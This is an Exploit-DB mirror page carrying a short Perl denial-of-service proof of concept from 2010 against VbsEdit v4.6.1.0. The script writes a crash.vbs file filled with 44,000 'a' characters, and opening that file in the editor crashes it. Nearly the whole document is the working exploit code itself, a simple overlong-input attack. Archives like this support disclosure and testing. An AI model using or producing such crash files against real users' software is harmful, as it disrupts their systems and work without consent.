exploit-db-mirror/exploits/windows/dos/14679.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

16 lines
No EOL
448 B
Perl
Executable file

# Exploit Title: VbsEdit v4.6.1.0 DoS
# Date: 8 / 12 / 2010
# Author: C G Tan
# Software Link: http://www.vbsedit.com/tr_download.asp
# Version: v4.6.1.0 32-bit Version
# Tested on: Windows XP SP 2, Windows XP SP 3
# CVE : N / A
# Description : This is the latest version from the official website.
#!/usr/bin/perl
#Opening crash.vbs in VbsEdit will cause VbsEdit to crash consistently.
open FILE, ">crash.vbs";
print FILE 'a'x44000;
close FILE;